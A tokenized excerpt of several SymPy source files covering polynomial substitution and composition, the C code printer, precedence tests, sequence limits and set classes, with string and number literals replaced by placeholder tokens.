monom [ i + <NUM_LIT:1> : ] <EOL> coeff = coeff * a ** n <EOL> if monom in poly : <EOL> coeff = coeff + poly [ monom ] <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> else : <EOL> del poly [ monom ] <EOL> else : <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def subs ( self , x , a = None ) : <EOL> f = self <EOL> if isinstance ( x , list ) and a is None : <EOL> for X , a in x : <EOL> f = f . subs ( X , a ) <EOL> return f <EOL> ring = f . ring <EOL> i = ring . index ( x ) <EOL> a = ring . domain . convert ( a ) <EOL> if ring . ngens == <NUM_LIT:1> : <EOL> result = ring . domain . zero <EOL> for ( n , ) , coeff in f . iterterms ( ) : <EOL> result += coeff * a ** n <EOL> return ring . ground_new ( result ) <EOL> else : <EOL> poly = ring . zero <EOL> for monom , coeff in f . 
iterterms ( ) : <EOL> n , monom = monom [ i ] , monom [ : i ] + ( <NUM_LIT:0> , ) + monom [ i + <NUM_LIT:1> : ] <EOL> coeff = coeff * a ** n <EOL> if monom in poly : <EOL> coeff = coeff + poly [ monom ] <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> else : <EOL> del poly [ monom ] <EOL> else : <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def compose ( f , x , a = None ) : <EOL> ring = f . ring <EOL> poly = ring . zero <EOL> gens_map = dict ( list ( zip ( ring . gens , list ( range ( ring . ngens ) ) ) ) ) <EOL> if a is not None : <EOL> replacements = [ ( x , a ) ] <EOL> else : <EOL> if isinstance ( x , list ) : <EOL> replacements = list ( x ) <EOL> elif isinstance ( x , dict ) : <EOL> replacements = sorted ( list ( x . items ( ) ) , key = lambda k : gens_map [ k [ <NUM_LIT:0> ] ] ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> for k , ( x , g ) in enumerate ( replacements ) : <EOL> replacements [ k ] = ( gens_map [ x ] , ring . ring_new ( g ) ) <EOL> for monom , coeff in f . iterterms ( ) : <EOL> monom = list ( monom ) <EOL> subpoly = ring . one <EOL> for i , g in replacements : <EOL> n , monom [ i ] = monom [ i ] , <NUM_LIT:0> <EOL> if n : <EOL> subpoly *= g ** n <EOL> subpoly = subpoly . mul_term ( ( tuple ( monom ) , coeff ) ) <EOL> poly += subpoly <EOL> return poly <EOL> def pdiv ( f , g ) : <EOL> return f . ring . dmp_pdiv ( f , g ) <EOL> def prem ( f , g ) : <EOL> return f . ring . dmp_prem ( f , g ) <EOL> def pquo ( f , g ) : <EOL> return f . ring . dmp_quo ( f , g ) <EOL> def pexquo ( f , g ) : <EOL> return f . ring . dmp_exquo ( f , g ) <EOL> def half_gcdex ( f , g ) : <EOL> return f . ring . dmp_half_gcdex ( f , g ) <EOL> def gcdex ( f , g ) : <EOL> return f . ring . dmp_gcdex ( f , g ) <EOL> def subresultants ( f , g ) : <EOL> return f . ring . dmp_subresultants ( f , g ) <EOL> def resultant ( f , g ) : <EOL> return f . ring . dmp_resultant ( f , g ) <EOL> def discriminant ( f ) : <EOL> return f . ring . 
dmp_discriminant ( f ) <EOL> def decompose ( f ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_decompose ( f ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def shift ( f , a ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_shift ( f , a ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def sturm ( f ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_sturm ( f ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def gff_list ( f ) : <EOL> return f . ring . dmp_gff_list ( f ) <EOL> def sqf_norm ( f ) : <EOL> return f . ring . dmp_sqf_norm ( f ) <EOL> def sqf_part ( f ) : <EOL> return f . ring . dmp_sqf_part ( f ) <EOL> def sqf_list ( f , all = False ) : <EOL> return f . ring . dmp_sqf_list ( f , all = all ) <EOL> def factor_list ( f ) : <EOL> return f . ring . dmp_factor_list ( f ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core import S <EOL> from sympy . core . compatibility import string_types , range <EOL> from sympy . printing . codeprinter import CodePrinter , Assignment <EOL> from sympy . printing . precedence import precedence <EOL> known_functions = { <EOL> "<STR_LIT>" : [ ( lambda x : not x . is_integer , "<STR_LIT>" ) ] , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> } <EOL> reserved_words = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:int>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:default>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT:float>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> class CCodePrinter ( CodePrinter ) : <EOL> """<STR_LIT>""" <EOL> printmethod = "<STR_LIT>" <EOL> language = "<STR_LIT:C>" <EOL> _default_settings = { <EOL> '<STR_LIT>' : None , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
<NUM_LIT:15> , <EOL> '<STR_LIT>' : { } , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : set ( ) , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : '<STR_LIT:_>' , <EOL> } <EOL> def __init__ ( self , settings = { } ) : <EOL> CodePrinter . __init__ ( self , settings ) <EOL> self . known_functions = dict ( known_functions ) <EOL> userfuncs = settings . get ( '<STR_LIT>' , { } ) <EOL> self . known_functions . update ( userfuncs ) <EOL> self . _dereference = set ( settings . get ( '<STR_LIT>' , [ ] ) ) <EOL> self . reserved_words = set ( reserved_words ) <EOL> def _rate_index_position ( self , p ) : <EOL> return p * <NUM_LIT:5> <EOL> def _get_statement ( self , codestring ) : <EOL> return "<STR_LIT>" % codestring <EOL> def _get_comment ( self , text ) : <EOL> return "<STR_LIT>" . format ( text ) <EOL> def _declare_number_const ( self , name , value ) : <EOL> return "<STR_LIT>" . format ( name , value ) <EOL> def _format_code ( self , lines ) : <EOL> return self . indent_code ( lines ) <EOL> def _traverse_matrix_indices ( self , mat ) : <EOL> rows , cols = mat . shape <EOL> return ( ( i , j ) for i in range ( rows ) for j in range ( cols ) ) <EOL> def _get_loop_opening_ending ( self , indices ) : <EOL> open_lines = [ ] <EOL> close_lines = [ ] <EOL> loopstart = "<STR_LIT>" <EOL> for i in indices : <EOL> open_lines . append ( loopstart % { <EOL> '<STR_LIT>' : self . _print ( i . label ) , <EOL> '<STR_LIT:start>' : self . _print ( i . lower ) , <EOL> '<STR_LIT:end>' : self . _print ( i . upper + <NUM_LIT:1> ) } ) <EOL> close_lines . append ( "<STR_LIT:}>" ) <EOL> return open_lines , close_lines <EOL> def _print_Pow ( self , expr ) : <EOL> if "<STR_LIT>" in self . known_functions : <EOL> return self . _print_Function ( expr ) <EOL> PREC = precedence ( expr ) <EOL> if expr . exp == - <NUM_LIT:1> : <EOL> return '<STR_LIT>' % ( self . parenthesize ( expr . base , PREC ) ) <EOL> elif expr . exp == <NUM_LIT:0.5> : <EOL> return '<STR_LIT>' % self . 
_print ( expr . base ) <EOL> else : <EOL> return '<STR_LIT>' % ( self . _print ( expr . base ) , <EOL> self . _print ( expr . exp ) ) <EOL> def _print_Rational ( self , expr ) : <EOL> p , q = int ( expr . p ) , int ( expr . q ) <EOL> return '<STR_LIT>' % ( p , q ) <EOL> def _print_Indexed ( self , expr ) : <EOL> dims = expr . shape <EOL> elem = S . Zero <EOL> offset = S . One <EOL> for i in reversed ( range ( expr . rank ) ) : <EOL> elem += expr . indices [ i ] * offset <EOL> offset *= dims [ i ] <EOL> return "<STR_LIT>" % ( self . _print ( expr . base . label ) , self . _print ( elem ) ) <EOL> def _print_Idx ( self , expr ) : <EOL> return self . _print ( expr . label ) <EOL> def _print_Exp1 ( self , expr ) : <EOL> return "<STR_LIT>" <EOL> def _print_Pi ( self , expr ) : <EOL> return '<STR_LIT>' <EOL> def _print_Infinity ( self , expr ) : <EOL> return '<STR_LIT>' <EOL> def _print_NegativeInfinity ( self , expr ) : <EOL> return '<STR_LIT>' <EOL> def _print_Piecewise ( self , expr ) : <EOL> if expr . args [ - <NUM_LIT:1> ] . cond != True : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> lines = [ ] <EOL> if expr . has ( Assignment ) : <EOL> for i , ( e , c ) in enumerate ( expr . args ) : <EOL> if i == <NUM_LIT:0> : <EOL> lines . append ( "<STR_LIT>" % self . _print ( c ) ) <EOL> elif i == len ( expr . args ) - <NUM_LIT:1> and c == True : <EOL> lines . append ( "<STR_LIT>" ) <EOL> else : <EOL> lines . append ( "<STR_LIT>" % self . _print ( c ) ) <EOL> code0 = self . _print ( e ) <EOL> lines . append ( code0 ) <EOL> lines . append ( "<STR_LIT:}>" ) <EOL> return "<STR_LIT:\n>" . join ( lines ) <EOL> else : <EOL> ecpairs = [ "<STR_LIT>" % ( self . _print ( c ) , self . _print ( e ) ) <EOL> for e , c in expr . args [ : - <NUM_LIT:1> ] ] <EOL> last_line = "<STR_LIT>" % self . _print ( expr . args [ - <NUM_LIT:1> ] . expr ) <EOL> return "<STR_LIT>" . join ( ecpairs ) + last_line + "<STR_LIT:U+0020>" . 
join ( [ "<STR_LIT:)>" * len ( ecpairs ) ] ) <EOL> def _print_ITE ( self , expr ) : <EOL> from sympy . functions import Piecewise <EOL> _piecewise = Piecewise ( ( expr . args [ <NUM_LIT:1> ] , expr . args [ <NUM_LIT:0> ] ) , ( expr . args [ <NUM_LIT:2> ] , True ) ) <EOL> return self . _print ( _piecewise ) <EOL> def _print_MatrixElement ( self , expr ) : <EOL> return "<STR_LIT>" . format ( expr . parent , expr . j + <EOL> expr . i * expr . parent . shape [ <NUM_LIT:1> ] ) <EOL> def _print_Symbol ( self , expr ) : <EOL> name = super ( CCodePrinter , self ) . _print_Symbol ( expr ) <EOL> if expr in self . _dereference : <EOL> return '<STR_LIT>' . format ( name ) <EOL> else : <EOL> return name <EOL> def _print_sign ( self , func ) : <EOL> return '<STR_LIT>' . format ( self . _print ( func . args [ <NUM_LIT:0> ] ) ) <EOL> def indent_code ( self , code ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( code , string_types ) : <EOL> code_lines = self . indent_code ( code . splitlines ( True ) ) <EOL> return '<STR_LIT>' . join ( code_lines ) <EOL> tab = "<STR_LIT:U+0020>" <EOL> inc_token = ( '<STR_LIT:{>' , '<STR_LIT:(>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> dec_token = ( '<STR_LIT:}>' , '<STR_LIT:)>' ) <EOL> code = [ line . lstrip ( '<STR_LIT>' ) for line in code ] <EOL> increase = [ int ( any ( map ( line . endswith , inc_token ) ) ) for line in code ] <EOL> decrease = [ int ( any ( map ( line . startswith , dec_token ) ) ) <EOL> for line in code ] <EOL> pretty = [ ] <EOL> level = <NUM_LIT:0> <EOL> for n , line in enumerate ( code ) : <EOL> if line == '<STR_LIT>' or line == '<STR_LIT:\n>' : <EOL> pretty . append ( line ) <EOL> continue <EOL> level -= decrease [ n ] <EOL> pretty . append ( "<STR_LIT>" % ( tab * level , line ) ) <EOL> level += increase [ n ] <EOL> return pretty <EOL> def ccode ( expr , assign_to = None , ** settings ) : <EOL> """<STR_LIT>""" <EOL> return CCodePrinter ( settings ) . 
doprint ( expr , assign_to ) <EOL> def print_ccode ( expr , ** settings ) : <EOL> """<STR_LIT>""" <EOL> print ( ccode ( expr , ** settings ) ) </s>
<s> from sympy . concrete . products import Product <EOL> from sympy . concrete . summations import Sum <EOL> from sympy . core . function import Derivative <EOL> from sympy . core . numbers import Integer , Rational , Float , oo <EOL> from sympy . core . relational import Rel <EOL> from sympy . core . symbol import symbols <EOL> from sympy . functions import sin <EOL> from sympy . integrals . integrals import Integral <EOL> from sympy . series . order import Order <EOL> from sympy . printing . precedence import precedence , PRECEDENCE <EOL> x , y = symbols ( "<STR_LIT>" ) <EOL> def test_Add ( ) : <EOL> assert precedence ( x + y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( x * y + <NUM_LIT:1> ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Function ( ) : <EOL> assert precedence ( sin ( x ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Derivative ( ) : <EOL> assert precedence ( Derivative ( x , y ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Integral ( ) : <EOL> assert precedence ( Integral ( x , y ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Mul ( ) : <EOL> assert precedence ( x * y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( - x * y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Number ( ) : <EOL> assert precedence ( Integer ( <NUM_LIT:0> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Integer ( <NUM_LIT:1> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Integer ( - <NUM_LIT:1> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Integer ( <NUM_LIT:10> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Rational ( <NUM_LIT:5> , <NUM_LIT:2> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Rational ( - <NUM_LIT:5> , <NUM_LIT:2> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Float ( <NUM_LIT:5> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( Float ( - <NUM_LIT:5> ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( oo ) == PRECEDENCE [ "<STR_LIT>" ] 
<EOL> assert precedence ( - oo ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Order ( ) : <EOL> assert precedence ( Order ( x ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Pow ( ) : <EOL> assert precedence ( x ** y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( - x ** y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( x ** - y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Product ( ) : <EOL> assert precedence ( Product ( x , ( x , y , y + <NUM_LIT:1> ) ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Relational ( ) : <EOL> assert precedence ( Rel ( x + y , y , "<STR_LIT:<>" ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Sum ( ) : <EOL> assert precedence ( Sum ( x , ( x , y , y + <NUM_LIT:1> ) ) ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_Symbol ( ) : <EOL> assert precedence ( x ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> def test_And_Or ( ) : <EOL> assert precedence ( x & y ) > precedence ( x | y ) <EOL> assert precedence ( ~ y ) > precedence ( x & y ) <EOL> assert precedence ( x + y ) > precedence ( x | y ) <EOL> assert precedence ( x + y ) > precedence ( x & y ) <EOL> assert precedence ( x * y ) > precedence ( x | y ) <EOL> assert precedence ( x * y ) > precedence ( x & y ) <EOL> assert precedence ( ~ y ) > precedence ( x * y ) <EOL> assert precedence ( ~ y ) > precedence ( x - y ) <EOL> assert precedence ( x & y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( x | y ) == PRECEDENCE [ "<STR_LIT>" ] <EOL> assert precedence ( ~ y ) == PRECEDENCE [ "<STR_LIT>" ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . core . sympify import sympify <EOL> from sympy . core . singleton import S <EOL> from sympy . core . add import Add <EOL> from sympy . core . function import PoleError <EOL> from sympy . series . limits import Limit <EOL> def difference_delta ( expr , n = None , step = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> expr = sympify ( expr ) <EOL> if n is None : <EOL> f = expr . free_symbols <EOL> if len ( f ) == <NUM_LIT:1> : <EOL> n = f . pop ( ) <EOL> elif len ( f ) == <NUM_LIT:0> : <EOL> return S . Zero <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % expr ) <EOL> step = sympify ( step ) <EOL> if step . is_number is False : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> elif step in [ S . Infinity , - S . Infinity ] : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> if hasattr ( expr , '<STR_LIT>' ) : <EOL> result = expr . _eval_difference_delta ( n , step ) <EOL> if result : <EOL> return result <EOL> return expr . subs ( n , n + step ) - expr <EOL> def dominant ( expr , n ) : <EOL> """<STR_LIT>""" <EOL> terms = Add . make_args ( expr . expand ( func = True ) ) <EOL> term0 = terms [ - <NUM_LIT:1> ] <EOL> comp = [ term0 ] <EOL> for t in terms [ : - <NUM_LIT:1> ] : <EOL> e = ( term0 / t ) . combsimp ( ) <EOL> l = limit_seq ( e , n ) <EOL> if l is S . Zero : <EOL> term0 = t <EOL> comp = [ term0 ] <EOL> elif l is None : <EOL> return None <EOL> elif l not in [ S . Infinity , - S . Infinity ] : <EOL> comp . append ( t ) <EOL> if len ( comp ) > <NUM_LIT:1> : <EOL> return None <EOL> return term0 <EOL> def _limit_inf ( expr , n ) : <EOL> try : <EOL> return Limit ( expr , n , S . Infinity ) . doit ( deep = False , sequence = False ) <EOL> except ( NotImplementedError , PoleError ) : <EOL> return None <EOL> def limit_seq ( expr , n = None , trials = <NUM_LIT:5> ) : <EOL> """<STR_LIT>""" <EOL> from sympy . concrete . 
summations import Sum <EOL> if n is None : <EOL> free = expr . free_symbols <EOL> if len ( free ) == <NUM_LIT:1> : <EOL> n = free . pop ( ) <EOL> elif not free : <EOL> return expr <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" <EOL> "<STR_LIT>" % ( expr ) ) <EOL> elif n not in expr . free_symbols : <EOL> return expr <EOL> for i in range ( trials ) : <EOL> if not expr . has ( Sum ) : <EOL> result = _limit_inf ( expr , n ) <EOL> if result is not None : <EOL> return result <EOL> num , den = expr . as_numer_denom ( ) <EOL> if not den . has ( n ) or not num . has ( n ) : <EOL> result = _limit_inf ( expr . doit ( ) , n ) <EOL> if result is not None : <EOL> return result <EOL> return None <EOL> num , den = ( difference_delta ( t . expand ( ) , n ) for t in [ num , den ] ) <EOL> expr = ( num / den ) . combsimp ( ) <EOL> if not expr . has ( Sum ) : <EOL> result = _limit_inf ( expr , n ) <EOL> if result is not None : <EOL> return result <EOL> num , den = expr . as_numer_denom ( ) <EOL> num = dominant ( num , n ) <EOL> if num is None : <EOL> return None <EOL> den = dominant ( den , n ) <EOL> if den is None : <EOL> return None <EOL> expr = ( num / den ) . combsimp ( ) </s>
<s> from __future__ import print_function , division <EOL> from itertools import product <EOL> from sympy . core . sympify import ( _sympify , sympify , converter , <EOL> SympifyError ) <EOL> from sympy . core . basic import Basic <EOL> from sympy . core . expr import Expr <EOL> from sympy . core . singleton import Singleton , S <EOL> from sympy . core . evalf import EvalfMixin <EOL> from sympy . core . numbers import Float <EOL> from sympy . core . compatibility import ( iterable , with_metaclass , <EOL> ordered , range , PY3 ) <EOL> from sympy . core . evaluate import global_evaluate <EOL> from sympy . core . function import FunctionClass <EOL> from sympy . core . mul import Mul <EOL> from sympy . core . relational import Eq <EOL> from sympy . core . symbol import Symbol , Dummy <EOL> from sympy . sets . contains import Contains <EOL> from sympy . utilities . misc import func_name , filldedent <EOL> from mpmath import mpi , mpf <EOL> from sympy . logic . boolalg import And , Or , Not , true , false <EOL> from sympy . utilities import subsets <EOL> class Set ( Basic ) : <EOL> """<STR_LIT>""" <EOL> is_number = False <EOL> is_iterable = False <EOL> is_interval = False <EOL> is_FiniteSet = False <EOL> is_Interval = False <EOL> is_ProductSet = False <EOL> is_Union = False <EOL> is_Intersection = None <EOL> is_EmptySet = None <EOL> is_UniversalSet = None <EOL> is_Complement = None <EOL> is_ComplexRegion = False <EOL> @ staticmethod <EOL> def _infimum_key ( expr ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> infimum = expr . inf <EOL> assert infimum . is_comparable <EOL> except ( NotImplementedError , <EOL> AttributeError , AssertionError , ValueError ) : <EOL> infimum = S . 
Infinity <EOL> return infimum <EOL> def union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return Union ( self , other ) <EOL> def intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return Intersection ( self , other ) <EOL> def intersection ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . intersect ( other ) <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def is_disjoint ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . intersect ( other ) == S . EmptySet <EOL> def isdisjoint ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . is_disjoint ( other ) <EOL> def _union ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return None <EOL> def complement ( self , universe ) : <EOL> """<STR_LIT>""" <EOL> return Complement ( universe , self ) <EOL> def _complement ( self , other ) : <EOL> if isinstance ( other , ProductSet ) : <EOL> switch_sets = ProductSet ( FiniteSet ( o , o - s ) for s , o in <EOL> zip ( self . sets , other . sets ) ) <EOL> product_sets = ( ProductSet ( * set ) for set in switch_sets ) <EOL> return Union ( p for p in product_sets if p != other ) <EOL> elif isinstance ( other , Interval ) : <EOL> if isinstance ( self , Interval ) or isinstance ( self , FiniteSet ) : <EOL> return Intersection ( other , self . complement ( S . Reals ) ) <EOL> elif isinstance ( other , Union ) : <EOL> return Union ( o - self for o in other . args ) <EOL> elif isinstance ( other , Complement ) : <EOL> return Complement ( other . args [ <NUM_LIT:0> ] , Union ( other . args [ <NUM_LIT:1> ] , self ) , evaluate = False ) <EOL> elif isinstance ( other , EmptySet ) : <EOL> return S . EmptySet <EOL> elif isinstance ( other , FiniteSet ) : <EOL> return FiniteSet ( * [ el for el in other if self . 
contains ( el ) != True ] ) <EOL> def symmetric_difference ( self , other ) : <EOL> return SymmetricDifference ( self , other ) <EOL> def _symmetric_difference ( self , other ) : <EOL> return Union ( Complement ( self , other ) , Complement ( other , self ) ) <EOL> @ property <EOL> def inf ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _inf <EOL> @ property <EOL> def _inf ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % self ) <EOL> @ property <EOL> def sup ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _sup <EOL> @ property <EOL> def _sup ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % self ) <EOL> def contains ( self , other ) : <EOL> """<STR_LIT>""" <EOL> other = sympify ( other , strict = True ) <EOL> ret = sympify ( self . _contains ( other ) ) <EOL> if ret is None : <EOL> ret = Contains ( other , self , evaluate = False ) <EOL> return ret <EOL> def _contains ( self , other ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % ( self , other ) ) <EOL> def is_subset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return self . intersect ( other ) == self <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def issubset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . is_subset ( other ) <EOL> def is_proper_subset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return self != other and self . is_subset ( other ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def is_superset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return other . is_subset ( self ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def issuperset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self . is_superset ( other ) <EOL> def is_proper_superset ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( other , Set ) : <EOL> return self != other and self . 
is_superset ( other ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % other ) <EOL> def _eval_powerset ( self ) : <EOL> raise NotImplementedError ( '<STR_LIT>' % self . func ) <EOL> def powerset ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _eval_powerset ( ) <EOL> @ property <EOL> def measure ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _measure <EOL> @ property <EOL> def boundary ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _boundary <EOL> @ property <EOL> def is_open ( self ) : <EOL> if not Intersection ( self , self . boundary ) : <EOL> return True <EOL> return None <EOL> @ property <EOL> def is_closed ( self ) : <EOL> return self . boundary . is_subset ( self ) <EOL> @ property <EOL> def closure ( self ) : <EOL> return self + self . boundary <EOL> @ property <EOL> def interior ( self ) : <EOL> return self - self . boundary <EOL> @ property <EOL> def _boundary ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def _eval_imageset ( self , f ) : <EOL> from sympy . sets . fancysets import ImageSet <EOL> return ImageSet ( f , self ) <EOL> @ property <EOL> def _measure ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" % self ) <EOL> def __add__ ( self , other ) : <EOL> return self . union ( other ) <EOL> def __or__ ( self , other ) : <EOL> return self . union ( other ) <EOL> def __and__ ( self , other ) : <EOL> return self . intersect ( other ) <EOL> def __mul__ ( self , other ) : <EOL> return ProductSet ( self , other ) <EOL> def __xor__ ( self , other ) : <EOL> return SymmetricDifference ( self , other ) <EOL> def __pow__ ( self , exp ) : <EOL> if not sympify ( exp ) . is_Integer and exp >= <NUM_LIT:0> : <EOL> raise ValueError ( "<STR_LIT>" % exp ) <EOL> return ProductSet ( [ self ] * exp ) <EOL> def __sub__ ( self , other ) : <EOL> return Complement ( self , other ) <EOL> def __contains__ ( self , other ) : <EOL> symb = sympify ( self . contains ( other ) ) <EOL> if not ( symb is S . true or symb is S . 
false ) : <EOL> raise TypeError ( '<STR_LIT>' % symb ) <EOL> return bool ( symb ) <EOL> class ProductSet ( Set ) : <EOL> """<STR_LIT>""" <EOL> is_ProductSet = True <EOL> def __new__ ( cls , * sets , ** assumptions ) : <EOL> def flatten ( arg ) : <EOL> if isinstance ( arg , Set ) : <EOL> if arg . is_ProductSet : <EOL> return sum ( map ( flatten , arg . args ) , [ ] ) <EOL> else : <EOL> return [ arg ] <EOL> elif iterable ( arg ) : <EOL> return sum ( map ( flatten , arg ) , [ ] ) <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> sets = flatten ( list ( sets ) ) <EOL> if EmptySet ( ) in sets or len ( sets ) == <NUM_LIT:0> : <EOL> return EmptySet ( ) <EOL> if len ( sets ) == <NUM_LIT:1> : <EOL> return sets [ <NUM_LIT:0> ] <EOL> return Basic . __new__ ( cls , * sets , ** assumptions ) <EOL> def _eval_Eq ( self , other ) : <EOL> if not other . is_ProductSet : <EOL> return <EOL> if len ( self . args ) != len ( other . args ) : <EOL> return false <EOL> return And ( * ( Eq ( x , y ) for x , y in zip ( self . args , other . args ) ) ) <EOL> def _contains ( self , element ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> if len ( element ) != len ( self . args ) : <EOL> return false <EOL> except TypeError : <EOL> return false <EOL> return And ( * <EOL> [ set . contains ( item ) for set , item in zip ( self . sets , element ) ] ) <EOL> def _intersect ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if not other . is_ProductSet : <EOL> return None <EOL> if len ( other . args ) != len ( self . args ) : <EOL> return S . EmptySet <EOL> return ProductSet ( a . intersect ( b ) <EOL> for a , b in zip ( self . sets , other . sets ) ) <EOL> def _union ( self , other ) : <EOL> if not other . is_ProductSet : <EOL> return None <EOL> if len ( other . args ) != len ( self . args ) : <EOL> return None <EOL> if self . args [ <NUM_LIT:0> ] == other . args [ <NUM_LIT:0> ] : <EOL> return self . args [ <NUM_LIT:0> ] * Union ( ProductSet ( 